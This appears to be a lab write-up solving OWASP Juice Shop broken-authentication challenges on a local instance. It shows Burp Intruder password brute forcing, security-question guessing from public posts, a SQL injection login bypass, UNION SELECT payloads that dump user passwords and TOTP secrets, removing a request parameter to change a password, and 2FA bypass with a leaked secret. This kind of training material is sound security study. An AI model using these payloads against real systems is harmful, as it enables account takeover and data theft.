Broken Authentication

Log in with the administrator’s credentials without previously

changing them. (Challenge 1)
I tried using a random password along with the administrator's email to log in, captured the
login packet in the process.

I sent it to Intruder and set up a Sniper attack with a password payload.

I noticed that the "common.txt" wordlist contained easy to guess passwords

I Copied and pasted the contents of the wordlist to Intruder’s Payload tab and waited for a
200 status code. Now logged in and this challenge was successfully completed

Reset Jim’s password via the Forgot Password

mechanism (Challenge 2)
I logged in using Jim's email, as I didn't know his password. Then, I initiated the password
reset process by selecting the "Forgot Password" option.
The security question asked for Jim's brother's name, and since the question hinted that Jim
is a celebrity.

I entered "Samuel" as his brother's name. After submitting the request, I received a 200
response, indicating success, and thus, I was able to reset Jim's password.
Reset the password of Bjoern’s OWASP account via
the Forgot Password (Challenge 3)
I entered "bjoern@owasp.org" as his email and found his favorite pet's name, "Zaya," via a
Twitter post.
I provided "Zaya" as the answer to the security question, and this successfully allowed me to
reset Bjoern's OWASP account password.

Log in with Chris' erased user account (Challenge 4)

I retrieved all the user credentials via SQL injection, then searched for Chris' email.

Upon finding "chris.pike@juice-sh.op," I applied SQL injection for login bypass, successfully
solving this challenge.

Reset Bender’s password via the Forgot Password

(Challenge 5)
I knew Bender's email but didn't know the password, so I clicked on 'Forgot Password.'
Then, security questions popped up, asking for the company Bender worked for first as an
adult. I searched about Bender on Google and found out he's a robot.

I discovered that Bender had a job at the metalworking factory, and I learned about the
suicide booths.

Finally, I had a guess that the answer might be 'Stop'n'Drop' based on this information. I
entered it as the answer to the security question, and the challenge was solved."

Log in with Bjoern’s Gmail account (Challenge 6)

Reference: Challenge Solution
At first, I didn't have any idea on how to solve this challenge, and I wasn't familiar with OAuth
either. So, I referred to the solution documentation to get an idea of how to proceed.
I logged in using my personal email account via Google and discovered how OAuth login is
handled through the debugger in the inspect tool.

I know Bjoern's email, which is "bjoern.kimminich@gmail.com". There was a function written

for OAuth login that required splitting the email first, then reversing the split string, followed
by joining the reversed string. After that, the string needed to be encoded using the btoa
method, which encodes the string and provides an encoded result. For example:
Original: Hello World! Encoded: SGVsbG8gV29ybGQh`
I tried all these steps in the console, copied the encoded string, and pasted it into the
password field. This solved the challenge!"
Change Bender’s password into slurmCl4ssic
(Challenge 7)
I found Bender's email but didn't know the password. I used SQL injection to log in and then
accessed the password change mechanism. There, I attempted to change Bender's
password by providing something as the current password and "slurmCl4ssic" as the new
one. But the system said the current password was wrong. To bypass this, I intercepted the
request, removed the current password parameter, and only included "slurmCl4ssic" as the
new password. That's how I changed Bender's password.
Reset the password of Bjoern’s account via the Forgot
Password mechanism (Challenge 8)
I found Bjoern's email but didn't know the password, so I used SQL injection to log in. Upon
accessing the password change mechanism, a security question prompted me for Bjoern's
postal code. After some searching, I found Bjoern's postal code and entered it. With that, I
was able to reset Bjoern's password and solve the challenge.
Solve the 2FA challenge for user "wurstbrot"
(Challenge 9)
I noticed the email address of the user, which was wurstbrot@juice-sh.op in the
administrator page. To retrieve a list of all user credentials via SQL Injection, I crafted
various payloads.

I tried using this payload and it fails with no such column: 2fakey.
[http://localhost:3000/rest/products/search?
q=%27))%20union%20select%20null,id,email,password,2fa,null,null,null,null%20from%20us
ers--

I tried using this payload and it fails with no such column: 2fakey.
[http://localhost:3000/rest/products/search?
q=%27))%20union%20select%20null,id,email,password,2fakey,null,null,null,null%20from%2
0users--

Finally, I tried using this payload and succeeds with a 200 response as this column exists!
[http://localhost:3000/rest/products/search?
q=%27))%20union%20select%20null,id,email,password,totpsecret,null,null,null,null%20from
%20users--

Payload understanding

1. )) : This part suggests the closing of some previous SQL query or statement.
2. union select : combining the results of two SELECT queries into a single result set.
3. null,id,email,password,totpsecret,null,null,null,null : These are the
columns am selecting from the "users" table. Each "null" represents a placeholder for
the columns am not interested in.
4. from users : This specifies the table am going to retrieve.
5. --- : This might be a comment delimiter used to comment out the rest of the original
SQL query.

In the response from the successful SQL injection payload, I found the entry of user
wurstbrot@juice-sh.op with a secret key named
'IFTXE3SPOEYVURT2MRYGI52TKJ4HC3KH' for 2FA.

1. I went to [http://localhost:3000/login] and used SQL Injection to log in with

wurstbrot@juice-sh.op'-- as Username and anything as Password.
2. I was presented with the Two Factor Authentication input screen,
Using Google Authenticator, I created a new entry by entering wurstbrot@juice-sh.op
as the account and the aforementioned secret key as the key. After providing the time-
based code, it generated a 6-digit token, which I entered into the 2FA field in Juice
Shop.

With that, the challenge was successfully solved.